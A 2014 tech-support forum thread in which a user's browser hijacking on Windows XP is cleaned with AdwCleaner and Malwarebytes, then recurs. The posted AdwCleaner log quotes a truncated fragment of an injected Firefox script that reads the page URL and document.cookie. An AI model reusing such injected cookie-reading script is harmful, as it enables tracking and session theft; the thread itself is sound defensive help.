Jump to content


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.


Browser hijacked every few seconds to fake “help” sites

  • Please log in to reply
5 replies to this topic

#1 desperatedirector


  • Members
  • 3 posts
  • Local time:11:27 AM

Posted 21 October 2014 - 12:10 PM

I am actually having to write this in Word and hope I can paste without a glitch. My browsers are effectively unusable. It was a miracle that I could register on the site—every 5-20ish seconds, my tab is hijacked to some site offering (heh heh) to “help” me fix my problem. This occurs in both Firefox and Chrome.
I am running an elderly XP (2002) SP3, Pentium D CPU 3 Ghz, 2.99 Ghz, 1.99 GB of RAM. A few days ago I came in and found the “run” window open but stupidly did NOT write down what it said. (My best guess is that a cleaning person in my office space discovered I forgot to log out completely . . .?) I had a bad feeling . . . sure enough, I started getting a subtle but persistent pop-up.  I downloaded Sophos Virus Removal and it found nothing.
After a while, the pop-up presented me with a choice about when I wanted to next see their window—I chose the “never” option and for about half a day it behaved, although my computer was greatly slowed down. Went home for the weekend vowing to contact you when I was next in (I have no other tech support option) and today all hell has broken loose.
I’m now going to try to log back in and paste this in as a new topic. Please forgive me if it double posts or something.

Edit: Moved topic from Windows XP to the more appropriate forum.~ Animal

BC AdBot (Login to Remove)


#2 Adam_2013


  • Members
  • 3 posts
  • Local time:10:27 AM

Posted 21 October 2014 - 01:46 PM

Hello & Welcome,


 There is a tool here in the downloads section That can prolly be beneficial.

called  adwcleaner to help remove unwanted programs.



Edited by Adam_2013, 21 October 2014 - 01:47 PM.

#3 Queen-Evie


    Official Bleepin' G.R.I.T.S. (and proud of it)

  • Members
  • 16,485 posts
  • Gender:Female
  • Location:My own little corner of the universe (somewhere in Alabama). It's OK, they know me here
  • Local time:10:27 AM

Posted 21 October 2014 - 04:30 PM

Instructions for using AdwCleaner

Please download AdwCleaner and install it.

When AdwCleaner opens you will see an image like the one below.


Click on Scan to start the scan.

Once the search is complete a list of the pending items will be displayed. If you see any which you do not want removed, remove the check mark next to it.

Click on Clean to remove the selected items. If you have any questions about any items in the list please copy and paste the list in your topic so we can review it.

You will receive a message telling you that all programs will be closed so that the infections can be removed. Click on OK. The computer will be restarted to complete the cleaning process.

When the cleaning process is complete a log of what was removed will be presented. Please copy and the paste this log in your topic.

Please run Malwarebytes AntiMalware

Please download Malwarebytes Anti-Malware. After clicking on the link the download will start automatically.

1) Double-click on mbam-setup.exe, then click on Run to install the application, follow the prompts through the installation.

2) Malwarebytes will automatically open. If this is the first time you have run this version of Malwarbytes you will see an image like the one below.


Click on Update Now, after Malwarebytes is updated click on Scan.

If this isn't the first time you have run this version, then you will see an image like the one below. Click on Scan


You will be prompted to update Malwarebytes, to do so click on Update Now.


3) The scan will automatically run now.


4) When the scan is complete the results will be displayed. Click on Quarantine All, then click on Apply Actions


5) To complete any actions taken you will be asked if you want to restart your computer, click on Yes


#4 desperatedirector

  • Topic Starter

  • Members
  • 3 posts
  • Local time:11:27 AM

Posted 22 October 2014 - 01:30 PM

THANK YOU!!! :bounce:

Everything is OK now--AdwCleaner stopped the hijacking and Malwarebytes actually found a trojan (and some other registry stuff) on another account on this machine!


Here is the AdwCleaner log as requested:


# AdwCleaner v4.001 - Report created 22/10/2014 at 13:27:15
# DB v
# Updated 20/10/2014 by Xplode
# Operating System : Microsoft Windows XP Service Pack 3 (32 bits)
# Username : Idony Lisle - ROOMP33
# Running from : C:\Documents and Settings\Idony Lisle\My Documents\Downloads\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

Folder Deleted : C:\Documents and Settings\All Users\Application Data\2308189059
Folder Deleted : C:\Documents and Settings\Guest\Local Settings\Application Data\PackageAware
[!] Folder Deleted : C:\Documents and Settings\All Users\Application Data\Performance Optimizer
Folder Deleted : C:\Documents and Settings\All Users\Application Data\ddeal4mmeu
Folder Deleted : C:\Documents and Settings\Guest\Application Data\Mozilla\Firefox\Profiles\luqvqqy2.default\Extensions\staged\vlby4c@zh-yoiiy.co.uk
Folder Deleted : C:\Documents and Settings\Idony Lisle\Application Data\Mozilla\Firefox\Profiles\j6nv4uzr.default\Extensions\vlby4c@zh-yoiiy.co.uk
File Deleted : C:\Documents and Settings\Idony Lisle\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage
File Deleted : C:\Documents and Settings\Idony Lisle\Local Settings\Application Data\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage-journal

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\bopakagnckmlgajfccecajhnimjiiedh
Key Deleted : HKLM\SOFTWARE\Classes\deaal4me.deaal4me
Key Deleted : HKLM\SOFTWARE\Classes\deaal4me.deaal4me.1.2
Key Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{35d80ae}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{ED0DF900-A58F-E23C-71AC-8FB7D50C69F5}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ED0DF900-A58F-E23C-71AC-8FB7D50C69F5}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{ED0DF900-A58F-E23C-71AC-8FB7D50C69F5}
Key Deleted : HKCU\Software\InstallCore
Key Deleted : HKCU\Software\Optimizer Pro
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09854D8E-46B5-057B-5B6E-BFD2A04AD5AB}
Data Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - c:\docume~1\alluse~1\applic~1\perfor~1\perfor~1.dll

***** [ Browsers ] *****

-\\ Internet Explorer v8.0.6001.18702

-\\ Mozilla Firefox v33.0 (x86 en-US)

[j6nv4uzr.default] - Line Deleted : user_pref("extensions.VWl.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net[...]

-\\ Google Chrome v38.0.2125.101


AdwCleaner[R0].txt - [3813 octets] - [22/10/2014 13:24:22]
AdwCleaner[S0].txt - [3714 octets] - [22/10/2014 13:27:15]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [3774 octets] ##########


I will be deleting the so-called "guest" account on my machine and changing my admin password as well. Is there anything else I should do?


I am so grateful!!

#5 desperatedirector

  • Topic Starter

  • Members
  • 3 posts
  • Local time:11:27 AM

Posted 23 October 2014 - 04:25 PM

Wait--it's already back again. I don't understand it. It really seemed to be gone.


I re-ran Malwarebytes and it didn't find it; I tried Spybot (which is what I have on my home computer) and it found a bunch of random things, but didn't kill it either. I had to go home before re-running AdwCleaner.


I didn't visit any sites after posting my last reply--just shut down that guest account and went home. But today I noticed the tell-tale lag before my browsers started up. Oddly, it didn't seem to affect Gmail in either Chrome or Firefox, but it hit when I opened new tabs.


Can anybody explain why this thing is so elusive? I would try to get hold of the re-formatting disks (difficult) but I'm afraid of just getting mysteriously re-infected.

#6 jimbotoo


  • Banned
  • 297 posts
  • Gender:Male
  • Local time:11:27 AM

Posted 27 October 2014 - 12:35 AM


Wait--it's already back again. I don't understand it. It really seemed to be gone.


Can anybody explain why this thing is so elusive? I would try to get hold of the re-formatting disks (difficult) but I'm afraid of just getting mysteriously re-infected.



welcome to the form desperatedirector :hello:

I am not a computer whiz, almost everybody here is better then me at fixing this stuff


But don't think this advice can hurt, look in your add ons, i had something like you have happen to me, nothing would remove it and in the end i found the bug was in add ons and I deleted.


all the anti virus stuff thought i wanted it there. it was called "GROOVERO" or something like that, even spybot left it alone, but i was not running teatimer or paranoid mode.


I also noted it seems easier to get add ons "IN" then take them off.


good luck


jimbotoo :bubbles:

Edited by jimbotoo, 27 October 2014 - 12:40 AM.

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users